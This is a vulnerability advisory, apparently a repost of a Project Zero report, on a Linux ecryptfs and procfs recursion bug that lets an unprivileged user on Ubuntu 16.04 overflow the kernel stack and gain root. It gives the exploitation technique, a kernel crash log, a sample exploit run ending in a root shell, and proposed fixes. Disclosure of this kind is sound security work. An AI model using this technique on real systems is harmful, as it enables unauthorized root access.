Linux ecryptfs and /proc/$pid/environ Privilege Escalation

2016.06.22
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Stacking filesystems, including ecryptfs, protect themselves against deep nesting, which would lead to kernel stack overflow, by tracking the recursion depth of filesystems. E.g. in ecryptfs, this is implemented in ecryptfs_mount() as follows: s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1; rc = -EINVAL; if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { pr_err("eCryptfs: maximum fs stacking depth exceeded\n"); goto out_free; } The files /proc/$pid/{mem,environ,cmdline}, when read, access the userspace memory of the target process, involving, if necessary, normal pagefault handling. If it was possible to mmap() them, an attacker could create a chain of e.g. /proc/$pid/environ mappings where process 1 has /proc/2/environ mapped into its environment area, process 2 has /proc/3/environ mapped into its environment area and so on. A read from /proc/1/environ would invoke the pagefault handler for process 1, which would invoke the pagefault handler for process 2 and so on. This would, again, lead to kernel stack overflow. One interesting fact about ecryptfs is that, because of the encryption involved, it doesn't just forward mmap to the lower file's mmap operation. Instead, it has its own page cache, maintained using the normal filemap helpers, and performs its cryptographic operations when dirty pages need to be written out or when pages need to be faulted in. Therefore, not just its read and write handlers, but also its mmap handler only uses the lower filesystem's read and write methods. This means that using ecryptfs, you can mmap [decrypted views of] files that normally wouldn't be mappable. Combining these things, it is possible to trigger recursion with arbitrary depth where: a reading userspace memory access in process A (from userland or from copy_from_user()) causes a pagefault in an ecryptfs mapping in process A, which causes a read from /proc/{B}/environ, which causes a pagefault in an ecryptfs mapping in process B, which causes a read from /proc/{C}/environ, which causes a pagefault in an ecryptfs mapping in process C, and so on. On systems with the /sbin/mount.ecryptfs_private helper installed (e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked during installation), this bug can be triggered by an unprivileged user. The mount helper considers /proc/$pid, where $pid is the PID of a process owned by the user, to be a valid mount source because the directory is "owned" by the user. I have attached both a generic crash PoC and a build-specific exploit that can be used to gain root privileges from a normal user account on Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version 4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux". dmesg output of the crasher: ``` [ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0 [ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40 [ 80.040028] PGD 1e0d067 PUD 0 [ 80.040028] Thread overran stack, or stack corrupted [ 80.040028] Oops: 0000 [#1] SMP [ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video [ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu [ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006 [ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000 [ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40 [ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046 [ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068 [ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200 [ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000 [ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200 [ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68 [ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000 [ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0 [ 80.040028] Stack: [ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00 [ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68 [ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200 [ 80.040028] Call Trace: [ 80.040028] <IRQ> [ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160 [ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0 [ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80 [ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0 [ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0 [ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60 [ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60 [ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60 [ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70 [ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290 [ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0 [ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60 [ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50 [ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90 [ 80.040028] <EOI> [ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d [ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40 [ 80.040028] RSP <ffff88021fc03d70> [ 80.040028] CR2: fffffffe4b9145c0 [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16 [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16 [ 80.040028] ---[ end trace 616e3de50958c35b ]--- [ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt [ 80.040028] Shutting down cpus with NMI [ 80.040028] Kernel Offset: disabled [ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt ``` example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed: ``` user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls compile.sh exploit.c hello.c suidhelper.c user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls compile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit all spammers ready recurser parent ready spam over fault chain set up, faulting now writing stackframes stackframes written killing 2494 post-corruption code is alive! children should be dead coredump handler set. recurser exiting. going to crash now suid file detected, launching rootshell... we have root privs now... root@user-VirtualBox:/proc# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user) ``` (If the exploit crashes even with the right kernel version, try restarting the machine. Also, ensure that no program like top/htop/... is running that might try to read process command lines. Note that the PoC and the exploit don't really clean up after themselves and leave mountpoints behind that prevent them from re-running without a reboot or manual unmounting.) Note that Ubuntu compiled their kernel with CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used to be in the past to not crash the kernel while exploiting this bug, and an overwrite of addr_limit would be useless because at the time the thread_info is overwritten, there are multiple instances of kernel_read() on the stack. Still, the bug is exploitable by carefully aligning the stack so that the vital components of thread_info are preserved, stopping with an out-of-bounds stack pointer and overwriting the thread stack using a normal write to an adjacent allocation of the buddy allocator. Regarding the fix, I think the following would be reasonable: - Explicitly forbid stacking anything on top of procfs by setting its s_stack_depth to a sufficiently large value. In my opinion, there is too much magic going on inside procfs to allow stacking things on top of it, and there isn't any good reason to do it. (For example, ecryptfs invokes open handlers from a kernel thread instead of normal user process context, so the access checks inside VFS open handlers are probably ineffective - and procfs relies heavily on those.) - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the lower filesystem doesn't expect to be called in pagefault-handling context, it probably shouldn't be called in that context. - Create a dedicated kernel stack cache outside of the direct mapping of physical memory that has a guard page (or a multi-page gap) at the bottom of each stack, and move the struct thread_info to a different place (if nothing else works, the top of the stack, above the pt_regs). While e.g. race conditions are more common than stack overflows in the Linux kernel, the whole vulnerability class of stack overflows is easy to mitigate, and the kernel is sufficiently complicated for unbounded recursion to emerge in unexpected places - or perhaps even for someone to discover a way to create a stack with a bounded length that is still too high. Therefore, I believe that guard pages are a useful mitigation. Nearly everywhere, stack overflows are caught using guard pages nowadays; this includes Linux userland, but also {### TODO ###} and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW). Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))` in schedule_debug() ought to be a direct panic instead of an oops. At the moment, when you hit it, you get a recursion between the scheduler invocation in do_exit() and the BUG_ON in the scheduler, and the kernel recurses down the stack until it hits something sufficiently important to cause a panic. I'm going to send (compile-tested) patches for my first two fix suggestions and the recursive oops bug. I haven't written a patch for the guard pages mitigation - I'm not familiar enough with the x86 subsystem for that. Notes regarding the exploit: It makes an invalid assumption that causes it to require at least around 6GB of RAM. It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell. The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=836


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top